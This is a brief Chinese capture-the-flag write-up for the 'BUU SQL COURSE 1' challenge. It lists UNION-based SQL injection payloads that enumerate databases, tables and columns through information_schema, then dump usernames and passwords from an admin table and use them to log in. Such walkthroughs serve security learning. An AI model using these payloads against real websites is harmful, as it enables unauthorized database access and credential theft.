暴库:(information_schema,ctftraining, mysql ,performance_schema,test, news)
2 ?id=-1 UNION SELECT 1,group_concat(schema_name) from information_schema. schemata
3
4 暴表:(admin, contents)
5 ?id=-1 UNION SELECT 1,group_concat(table_name) from information_schema.tables where table_schema="news"
6
7 暴字段:(id,username, password)
8 ?id=-1 UNION SELECT 1,group_concat(column_name) from information_schema.columns where table_name="admin"
9
10 暴 密码:
11 ?id=-1 UNION SELECT 1,concat(username,0x3a,password) from admin
Mysql中concat和group_concat的用法:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc
最后出来了账号密码:
利用账号密码进行登录
BUU SQL COURSE 1
标签:code 抓包 登录 orm 理想 注入 height 隐藏 sel
查看更多关于BUU SQL COURSE 1的详细内容...